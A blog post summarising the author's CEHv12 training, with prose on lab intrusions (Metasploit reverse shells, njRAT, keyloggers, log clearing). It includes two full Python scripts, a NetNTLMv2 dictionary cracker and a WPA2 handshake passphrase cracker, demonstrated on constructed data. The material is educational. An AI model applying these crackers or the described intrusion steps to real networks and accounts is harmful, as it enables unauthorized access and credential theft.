My Overview of the CEH certification
- kkalvani
- Oct 23, 2024
I recently obtained my CEHv12 certification after a lot of studying and exam preparation. This article gives a brief summary of the useful concepts and tools the course covers.
Environment I enjoyed practicing on - Parrot OS
I explored amazing tools for ethical hacking using the CEH methodology on various targets, where I practiced:
Reconnaissance Techniques –
Gathered information using advanced Google hacking (Google dorks), Whois queries, Netcraft, Photon, theHarvester, BillCipher, nslookup, the OSINT Framework, and more.
Scanning and Enumeration Techniques –
Nmap became my go-to for discovering live hosts, open ports and services, OS detection and banner grabbing, and IDS/firewall evasion. I also explored NetBIOS, SNMP, NFS, and DNS enumeration (using dig to check whether a name server allows DNS zone transfers).
Vulnerability Analysis –
Automated scanners like OpenVAS, Nessus, and Nikto identified vulnerabilities, supplemented by manual research in the NVD and CVE databases, CWE weakness classifications, and CVSS severity scoring.
System Hacking Phases and Techniques –
Using gathered information, I attempted system access via:
Password Cracking – Captured NetNTLMv2 challenge-response hashes with Responder and cracked them with John the Ripper; also ran automated brute-force and dictionary attacks against Windows password hashes with L0phtCrack.
Client-Side Vulnerabilities – Compromised a poorly patched Windows 11 machine by generating a malicious payload with Metasploit, hosting it on an Apache2 server for the victim to fetch, and catching the reverse_tcp callback as a Meterpreter session. Even with improved phishing defences, attackers still compromise such hosts with tailored malware delivered this way.
Escalating Privileges – Used tools and techniques such as BeRoot, GhostPack's Seatbelt, named pipe impersonation, Meterpreter's hashdump, and Mimikatz.
Maintaining Access – Used spyware and keyloggers for persistence, and NTFS alternate data streams and rootkits to hide files.
Covering Tracks – Disabled/enabled auditing, cleared or manipulated logs to mislead investigators.
Ran malware such as a Trojan built with njRAT, which after execution gave control over screen capture, keylogging, and file access. Trojans like this are typically delivered through phishing emails. From a Meterpreter shell I could upload files, and njRAT then kept a persistent connection back to the attacker, allowing manipulation of directories, processes, and services on the victim.
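To make the "Password Cracking" step above concrete, here is an added example (written for this article, not code from the CEH course, Responder, or John) of what a cracker does with a Responder-style NetNTLMv2 line: it recomputes the NTProofStr for each wordlist candidate and compares it with the captured one. The user, domain, challenge, blob and wordlist are constructed in the script; MD4 is implemented in pure Python because OpenSSL builds often disable it.

```python
"""Dictionary attack on a NetNTLMv2 capture (added example, constructed data)."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    x &= MASK
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 needs OpenSSL's legacy provider)."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    hh = lambda x, y, z: x ^ y ^ z
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):                           # round 1
            a = _rotl(a + f(b, c, d) + X[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                           # round 2
            k = (i % 4) * 4 + i // 4
            a = _rotl(a + g(b, c, d) + X[k] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                           # round 3
            a = _rotl(a + hh(b, c, d) + X[r3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(x + y) & MASK for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is what hashdump/Mimikatz show."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password: str, user: str, domain: str,
                 server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr per MS-NLMP: HMAC-MD5 keyed with NTOWFv2 over challenge || blob."""
    v2_key = hmac.new(nt_hash(password),
                      (user.upper() + domain).encode("utf-16-le"),
                      hashlib.md5).digest()
    return hmac.new(v2_key, server_challenge + blob, hashlib.md5).digest()


def crack_netntlmv2(capture_line: str, wordlist):
    """capture_line in Responder's format: user::domain:challenge:ntproofstr:blob."""
    user, _, domain, chal_hex, proof_hex, blob_hex = capture_line.split(":")
    chal, proof, blob = (bytes.fromhex(chal_hex), bytes.fromhex(proof_hex),
                         bytes.fromhex(blob_hex))
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


def make_capture(user: str, domain: str, password: str) -> str:
    """Constructed stand-in for a Responder capture: the client-side computation
    with a fixed server challenge and a simplified NTLMv2 blob (assumption: a
    real blob also carries a timestamp, client nonce and AV pairs)."""
    chal = bytes.fromhex("1122334455667788")
    blob = bytes.fromhex("0101000000000000") + b"\x00" * 8 + bytes(range(8)) + b"\x00" * 4
    proof = ntlmv2_proof(password, user, domain, chal, blob)
    return f"{user}::{domain}:{chal.hex()}:{proof.hex()}:{blob.hex()}"


if __name__ == "__main__":
    line = make_capture("alice", "LAB", "Summer2024!")   # constructed, not a real capture
    print(line)
    print("cracked:", crack_netntlmv2(line, ["password", "Welcome1", "Summer2024!"]))
```

The same verification is what John and hashcat run, only vectorised across millions of candidates per second; the point of the example is that a NetNTLMv2 line is not a reusable hash (the challenge and blob are per-session), so it has to be cracked offline rather than passed.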
Other hacking topics I enjoyed:
Network Perimeter Hacking –
Learned concepts like password sniffing with Wireshark, ARP poisoning with arpspoof, MITM attacks with Cain & Abel, DHCP starvation with Yersinia, social engineering with the Social-Engineer Toolkit (SET), DoS/DDoS, and session hijacking using tools like OWASP ZAP and bettercap.
Wireless Network Hacking –
Studied WEP, WPA/WPA2/WPA3 encryption; cracking WEP after putting the adapter into monitor mode with airmon-ng; and cracking WPA/WPA2 by capturing the four-way handshake (PSK) with airodump-ng and running aircrack-ng against it with a wordlist.
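As an added example (not from the post, not aircrack-ng's code), the following shows why the four-way handshake is enough to crack a WPA2-PSK passphrase offline: from the SSID, both MACs, both nonces and the client's EAPOL message 2, a cracker derives PMK and PTK for each candidate passphrase and checks whether the frame's MIC matches. The SSID, MACs, nonces and EAPOL frame below are constructed in the script, and the frame is simplified (no key data), which is an assumption made only to keep the example short.

```python
"""Dictionary attack on a constructed WPA2 four-way handshake (added example)."""
import hashlib
import hmac

# Constructed handshake parameters (assumptions, not a real capture)
SSID = "CEH-Lab"
AP_MAC = bytes.fromhex("0013370000aa")
STA_MAC = bytes.fromhex("00deadbeef01")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
MIC_OFFSET = 81          # MIC field position inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """PRF-512 over 'Pairwise key expansion' with MACs and nonces ordered low-to-high."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]       # KCK = ptk[0:16], KEK = ptk[16:32], TK = ptk[32:48]


def eapol_mic(kck: bytes, frame_with_zeroed_mic: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame)[:16]."""
    return hmac.new(kck, frame_with_zeroed_mic, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal 802.1X EAPOL-Key message 2 (assumed layout: no key data appended)."""
    key_info = 0x010A     # MIC set | pairwise key | descriptor version 2 (HMAC-SHA1-AES)
    body = (bytes([2])                         # descriptor type: RSN
            + key_info.to_bytes(2, "big")
            + (16).to_bytes(2, "big")          # key length
            + (1).to_bytes(8, "big")           # replay counter
            + snonce                           # 32-byte nonce
            + b"\x00" * 16                     # key IV
            + b"\x00" * 8                      # key RSC
            + b"\x00" * 8                      # key ID
            + mic
            + (0).to_bytes(2, "big"))          # key data length
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body   # EAPOL v1, type Key


def crack_wpa2(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, wordlist):
    """Return the passphrase whose derived KCK reproduces the captured MIC, else None."""
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = eapol_msg2[:MIC_OFFSET] + b"\x00" * 16 + eapol_msg2[MIC_OFFSET + 16:]
    for candidate in wordlist:
        ptk = ptk_from_pmk(pmk_from_passphrase(candidate, ssid),
                           ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], zeroed), captured_mic):
            return candidate
    return None


def forge_handshake_capture(passphrase: str) -> bytes:
    """Constructed stand-in for airodump-ng's capture: what the client would send
    as message 2 when the network's passphrase is `passphrase`."""
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    mic = eapol_mic(ptk[:16], build_eapol_msg2(SNONCE))
    return build_eapol_msg2(SNONCE, mic)


if __name__ == "__main__":
    frame = forge_handshake_capture("labpassword")        # constructed capture
    print("cracked:", crack_wpa2(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, frame,
                                 ["admin123", "labpassword", "letmein"]))
```

Each candidate costs 4096 PBKDF2 rounds, which is why aircrack-ng is slow on CPU and why attackers pre-compute PMKs per SSID or move to hashcat on GPUs; it is also why a long, non-dictionary passphrase defeats this attack even though WPA2-PSK itself is unchanged.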